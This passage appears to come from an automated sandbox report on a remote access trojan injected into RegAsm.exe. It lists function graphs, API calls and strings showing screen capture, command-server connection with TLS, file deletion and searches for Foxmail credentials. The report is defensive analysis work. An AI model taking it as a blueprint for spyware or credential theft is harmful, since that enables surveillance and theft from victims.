                                                                                                                                  control_flow_graph 494 418eb1-418ef8 CreateDCA CreateCompatibleDC call 419360 497 418efa-418efc 494->497 498 418efe-418f19 call 4193a2 494->498 497->498 500 418f1d-418f1f 497->500 498->500 502 418f71-418f78 call 402093 500->502 503 418f21-418f23 500->503 507 418f7d-418f89 502->507 503->502 504 418f25-418f5c call 4193d8 CreateCompatibleBitmap 503->504 509 418f8a-418f94 SelectObject 504->509 510 418f5e-418f6a DeleteDC * 2 504->510 512 418fa5-418fcc StretchBlt 509->512 513 418f96 509->513 511 418f6b DeleteObject 510->511 511->502 512->513 514 418fce-418fd3 512->514 515 418f97-418fa3 DeleteDC * 2 513->515 516 418fd5-418fea GetCursorInfo 514->516 517 41904f-419057 514->517 515->511 516->517 518 418fec-419000 GetIconInfo 516->518 519 419099-4190ab GetObjectA 517->519 520 419059-419060 517->520 518->517 521 419002-41904b DeleteObject * 2 DrawIcon 518->521 519->513 524 4190b1-4190c3 519->524 522 419062-419087 BitBlt 520->522 523 419089-419096 520->523 521->517 522->519 523->519 525 4190c5-4190c7 524->525 526 4190c9-4190d3 524->526 527 419100 525->527 528 4190d5-4190df 526->528 529 419104-41910d 526->529 527->529 528->529 531 4190e1-4190eb 528->531 530 41910e-419148 LocalAlloc 529->530 532 419154-41918b GlobalAlloc 530->532 533 41914a-419151 530->533 531->529 534 4190ed-4190f3 531->534 535 419196-4191ab GetDIBits 532->535 536 41918d-419191 532->536 533->532 537 4190f5-4190fb 534->537 538 4190fd-4190ff 534->538 539 4191d3-41929b call 4020df * 2 call 40250a call 403376 call 40250a call 403376 call 40250a call 403376 DeleteObject GlobalFree DeleteDC 535->539 540 4191ad-4191ce DeleteDC * 2 DeleteObject GlobalFree 535->540 536->515 537->530 538->527 557 4192a0-4192c4 call 402055 call 401fd8 * 2 539->557 558 41929d-41929e DeleteDC 539->558 540->502 557->507 558->557
                                                                                                                                  APIs
                                                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                                                    • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                                                                  • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                                                                                  • GetIconInfo.USER32 ref: 00418FF8
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00419027
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00419034
                                                                                                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                                                                  • DeleteDC.GDI32(?), ref: 004191B7
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                                                                  • GlobalFree.KERNELBASE(?), ref: 00419283
                                                                                                                                  • DeleteDC.GDI32(?), ref: 00419293
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                                                                  • String ID: DISPLAY
                                                                                                                                  • API String ID: 4256916514-865373369
                                                                                                                                  • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                                                                  • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                                                                                  • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                                                                  • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                                                                  Function 00414F65 Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809sleepnetworkCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 565 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 578 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 565->578 579 414faf-414fb6 Sleep 565->579 594 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 578->594 595 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 578->595 579->578 594->595 648 415127-41512e 595->648 649 415119-415125 595->649 650 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 648->650 649->650 677 415210-41521e call 40482d 650->677 678 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 650->678 684 415220-415246 call 402093 * 2 call 41b580 677->684 685 41524b-415260 call 404f51 call 4048c8 677->685 701 415ade-415af0 call 404e26 call 4021fa 678->701 684->701 700 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 685->700 685->701 765 4153bb-4153c8 call 405aa6 700->765 766 4153cd-4153f4 call 401fab call 4135e1 700->766 713 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 701->713 714 415b18-415b20 call 401e8d 701->714 713->714 714->595 765->766 772 4153f6-4153f8 766->772 773 4153fb-4154c0 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 766->773 772->773 796 4154c5-415a51 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 773->796 1019 415a53-415a5a 796->1019 1020 415a65-415a6c 796->1020 1019->1020 1021 415a5c-415a5e 1019->1021 1022 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 1020->1022 1023 415a6e-415a73 call 40b08c 1020->1023 1021->1020 1034 415aac-415ab8 CreateThread 1022->1034 1035 415abe-415ad9 call 401fd8 * 2 call 401f09 1022->1035 1023->1022 1034->1035 1035->701
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000,00000029,004752F0,8)3,00000000), ref: 00414FB6
                                                                                                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                                                                  • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                  • String ID: | $%I64u$5.1.3 Pro$8)3$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$P2$Rmc-IAW1Y3$TLS Off$TLS On $dMG$hlight$h{3$name$NG$NG
                                                                                                                                  • API String ID: 524882891-663180811
                                                                                                                                  • Opcode ID: a72eeb24de60c0ea1368a0ec08cfe7818a5c44cf4a835cb23a330527dfdbf037
                                                                                                                                  • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                                                                  • Opcode Fuzzy Hash: a72eeb24de60c0ea1368a0ec08cfe7818a5c44cf4a835cb23a330527dfdbf037
                                                                                                                                  • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
                                                                                                                                  Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1042 412aef-412b38 GetModuleFileNameW call 4020df * 3 1049 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 1042->1049 1074 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1049->1074 1097 412c66 1074->1097 1098 412c58-412c60 Sleep 1074->1098 1099 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1097->1099 1098->1074 1098->1097 1122 412d08 1099->1122 1123 412cfa-412d02 Sleep 1099->1123 1124 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1122->1124 1123->1099 1123->1122 1147 412daa-412dcf 1124->1147 1148 412d9c-412da4 Sleep 1124->1148 1149 412dd3-412def call 401f04 call 41c516 1147->1149 1148->1124 1148->1147 1154 412df1-412e00 call 401f04 DeleteFileW 1149->1154 1155 412e06-412e22 call 401f04 call 41c516 1149->1155 1154->1155 1162 412e24-412e3d call 401f04 DeleteFileW 1155->1162 1163 412e3f 1155->1163 1165 412e43-412e5f call 401f04 call 41c516 1162->1165 1163->1165 1171 412e61-412e73 call 401f04 DeleteFileW 1165->1171 1172 412e79-412e7b 1165->1172 1171->1172 1174 412e88-412e93 Sleep 1172->1174 1175 412e7d-412e7f 1172->1175 1174->1149 1176 412e99-412eab call 406b63 1174->1176 1175->1174 1178 412e81-412e86 1175->1178 1181 412f01-412f20 call 401f09 * 3 1176->1181 1182 412ead-412ebb call 406b63 1176->1182 1178->1174 1178->1176 1193 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1181->1193 1182->1181 1188 412ebd-412ecb call 406b63 1182->1188 1188->1181 1194 412ecd-412ef9 Sleep call 401f09 * 3 1188->1194 1209 412f63-412f89 call 401f09 call 405b05 1193->1209 1194->1049 1207 412eff 1194->1207 1207->1193 1214 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1209->1214 1215 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1209->1215 1284 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1214->1284 1215->1284
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63841986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                  • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                                                                  • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                  • String ID: /stext "$0TG$0TG$NG$NG
                                                                                                                                  • API String ID: 1223786279-2576077980
                                                                                                                                  • Opcode ID: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
                                                                                                                                  • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                                                                                  • Opcode Fuzzy Hash: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
                                                                                                                                  • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                                                                                                  Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                    • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                    • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                    • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                    • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                  • String ID: )$Foxmail$ProgramFiles
                                                                                                                                  • API String ID: 672098462-2938083778
                                                                                                                                  • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                  • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                  • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                  • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                                                                                  Function 00414DC1 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1357 414dc1-414dfd 1358 414e03-414e18 GetSystemDirectoryA 1357->1358 1359 414f18-414f23 1357->1359 1360 414f0e 1358->1360 1361 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1358->1361 1360->1359 1366 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1361->1366 1367 414e6c-414e76 GetProcAddress 1361->1367 1380 414f0a-414f0d 1366->1380 1381 414ebd-414ec7 GetProcAddress 1366->1381 1368 414e78-414e7b FreeLibrary 1367->1368 1369 414e7d-414e7f 1367->1369 1368->1369 1369->1366 1371 414ed2 1369->1371 1374 414ed4-414ee5 GetProcAddress 1371->1374 1376 414ee7-414eeb 1374->1376 1377 414eef-414ef2 FreeLibrary 1374->1377 1376->1374 1378 414eed 1376->1378 1379 414ef4-414ef6 1377->1379 1378->1379 1379->1380 1382 414ef8-414f08 1379->1382 1380->1360 1383 414ec9-414ecc FreeLibrary 1381->1383 1384 414ece-414ed0 1381->1384 1382->1380 1382->1382 1383->1384 1384->1371 1384->1380
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                  • API String ID: 2490988753-744132762
                                                                                                                                  • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                                                  • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                                                                  • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                                                  • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                                                                                                  Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1385 4048c8-4048e8 connect 1386 404a1b-404a1f 1385->1386 1387 4048ee-4048f1 1385->1387 1390 404a21-404a2f WSAGetLastError 1386->1390 1391 404a97 1386->1391 1388 404a17-404a19 1387->1388 1389 4048f7-4048fa 1387->1389 1392 404a99-404a9e 1388->1392 1393 404926-404930 call 420cf1 1389->1393 1394 4048fc-404923 call 40531e call 402093 call 41b580 1389->1394 1390->1391 1395 404a31-404a34 1390->1395 1391->1392 1407 404941-40494e call 420f20 1393->1407 1408 404932-40493c 1393->1408 1394->1393 1397 404a71-404a76 1395->1397 1398 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1395->1398 1400 404a7b-404a94 call 402093 * 2 call 41b580 1397->1400 1398->1391 1400->1391 1417 404950-404973 call 402093 * 2 call 41b580 1407->1417 1418 404987-404992 call 421ad1 1407->1418 1408->1400 1447 404976-404982 call 420d31 1417->1447 1431 4049c4-4049d1 call 420e97 1418->1431 1432 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1418->1432 1444 4049d3-4049f6 call 402093 * 2 call 41b580 1431->1444 1445 4049f9-404a14 CreateEventW * 2 1431->1445 1432->1447 1444->1445 1445->1388 1447->1391
                                                                                                                                  APIs
                                                                                                                                  • connect.WS2_32(FFFFFFFF,02084830,00000010), ref: 004048E0
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                  • API String ID: 994465650-2151626615
                                                                                                                                  • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                                                                  • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                                                                  • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                                                                  • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                                                                                                  Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                                  • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3658366068-0
                                                                                                                                  • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                                  • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                                                                  • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                                  • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                                                                                                  Function 0040A761 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 163sleepCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                                                    • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
